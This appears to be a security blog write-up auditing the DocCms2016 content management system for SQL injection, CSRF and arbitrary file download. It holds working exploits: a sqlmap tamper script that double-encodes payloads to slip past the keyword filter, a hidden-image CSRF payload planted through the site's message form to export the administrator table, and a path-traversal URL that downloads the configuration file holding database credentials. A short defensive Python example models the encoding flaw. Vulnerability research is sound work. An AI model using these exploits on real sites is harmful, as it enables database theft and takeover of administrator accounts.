0x01 Preface

DocCms is an enterprise website content management system aimed at enterprises, webmasters, developers, network companies, VI planning and design companies, SEO promotion and marketing companies, website beginners and other users. It is built for enterprise brand and information sites, but is also suitable for personal and portal site construction.

0x02 Environment Setup

DocCms official website: www.doccms.com

Program source code: DocCms2016

Download it at pan.baidu.com/s/1pLclifL

0x03 SQL Injection

Code analysis

In /content/search/index.php, the keyword parameter is first checked for illegal characters:

The checkSqlStr function is defined in /inc/function.php:

The checkSqlStr function runs a regular-expression match over the string passed in to look for illegal characters.

Next, look at the get_search_result function in /content/search/index.php:

The keyword parameter is checked for illegal characters, then URL-decoded, and then concatenated into the SQL statement that is executed.

If we pass a double URL-encoded string, the illegal-character check is bypassed: the string is then decoded by urldecode and passed to the database for execution, resulting in a SQL injection vulnerability.
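An added example (not DocCms code) in Python that models the check-then-decode ordering described above next to the hardened ordering; the illegal-character pattern is an assumed stand-in, since checkSqlStr's real regex is not shown here, and the sample keyword is constructed:

```python
import re
from urllib.parse import quote, unquote

# Assumed stand-in for DocCms's checkSqlStr pattern (the real regex is not on this page):
# reject quotes, statement terminators and SQL comment markers.
ILLEGAL = re.compile(r"['\";#]|/\*|\*/")


def naive_is_clean(param: str) -> bool:
    """Vulnerable order: the blacklist runs on the parameter as received,
    before the handler's own urldecode() call."""
    return ILLEGAL.search(param) is None


def fully_decode(value: str, max_rounds: int = 8) -> str:
    """Collapse nested percent-encoding by decoding until the value stops changing.
    The round limit keeps pathological inputs from looping forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_is_clean(param: str) -> bool:
    """Hardened order: normalize first so the check sees what the database would see.
    (The real fix is a parameterized query; this only closes the encoding gap.)"""
    return ILLEGAL.search(fully_decode(param)) is None


def simulate_search(raw_query_value: str) -> dict:
    """Model one request: the web server decodes the query string once (what PHP's
    $_GET holds), then each check runs on that value."""
    php_param = unquote(raw_query_value)
    return {
        "seen_by_check": php_param,
        "naive_allows": naive_is_clean(php_param),
        "hardened_allows": hardened_is_clean(php_param),
        "reaches_sql_as": fully_decode(php_param),
    }


# Constructed sample: a tautology keyword, sent single- and double-encoded.
SAMPLE = "' OR 1=1#"
SINGLE_ENCODED = quote(SAMPLE)         # what a normal client sends
DOUBLE_ENCODED = quote(quote(SAMPLE))  # what a double-encoding tamper sends
```

The naive check blocks the single-encoded request but lets the double-encoded one through unchanged into the SQL string; normalizing before the check closes that gap, though a blacklist remains a weaker control than binding the keyword as a query parameter.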

Exploit

Double URL-encoding bypass: the check can be bypassed with a sqlmap tamper script that URL-encodes the payload twice. The tamper script is as follows:

```python
#!/usr/bin/env python
# sqlmap tamper script (Python 2 era: urllib.quote)
import re
from urllib import quote

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    # URL-encode the payload twice: the web server decodes it once before the
    # illegal-character check, and the handler's urldecode() restores the original.
    retVal = payload
    retVal = quote(quote(retVal))
    return retVal
```

Load the tamper script in sqlmap to extract sensitive database data.

0x04 CSRF

Code analysis

In \doccms\admini\controllers\system\back.php:

The export function processes the tables and sizelimit parameters directly and exports the SQL backup file without verifying where the request came from, so the database backup module is vulnerable to CSRF.

Exploit

1. Construct the CSRF exploit code, which backs up only the administrator user table doc_user:

```html
<h2>CRSFTester</h2>
<img src="http://127.0.0.1:80/admini/index.php?m=system&s=bakup&a=export&tables[]=doc_user&sizelimit=2048&dosubmit=start backup data" width="0" height="0" border="0"/>
```

2. Submit the CSRF exploit code through the online message form on the website home page:

3. When the administrator views the messages in the admin backend, the database is automatically backed up to /doccms/temp/data:

0x05 Arbitrary File Download

Code analysis

In \doccms\admini\controllers\system\back.php:

The download function only performs a simple check on filename and then concatenates filename into the download path, resulting in an arbitrary file download vulnerability.

Exploit

1. Construct a URL that downloads the global configuration file to obtain sensitive information: http://127.0.0.1/admini/index.php?m=system&s=bakup&a=download&filename=../../config/doc-config-cn.php


2. Obtain sensitive information such as the database account and password:


To be continued.


About me: a network security enthusiast dedicated to sharing original, high-quality content. Follow my personal WeChat official account, Bypass--, to read more articles.